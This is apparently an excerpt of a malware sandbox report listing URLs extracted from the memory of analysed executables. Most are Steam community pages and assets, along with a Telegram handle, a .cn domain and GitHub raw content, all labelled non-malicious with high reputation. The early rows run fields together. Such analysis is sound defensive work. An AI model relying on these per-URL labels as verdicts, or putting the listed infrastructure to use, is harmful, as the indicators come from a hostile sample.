                                                                                                            https://sketchfab.come770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lv.queniujq.cne770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.youtube.com/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                      high
                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=englie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                        high
                                                                                                                        https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=englie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                            high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pnge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                              high
                                                                                                                              http://crl.micropowershell.exe, 0000000E.00000002.2326236200.0000000002C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                                    high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascrie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/recaptcha/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://checkout.steampowered.com/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
Columns: URL (string as extracted), Source (process and memory dump, or dropped file), Malicious, Reputation. URL strings are reproduced exactly as found in memory or in dropped files: truncated strings and trailing junk characters (for example "(", "%", ";", "#", "&amp") are part of the extracted data, not of the original URL.

URL: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://t.me/m3wm0w(
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://t.me/m3wm0w%
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000071E000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://steamcommunity.com/Hzzp
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://store.steampowered.com/;
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://store.steampowered.com/about/
Source: 76561199804377619[1].htm0.15.dr
Malicious: false
Reputation: high

URL: https://community.cloudflare.steamstatic.com/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://steamcommunity.com/my/wishlist/
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 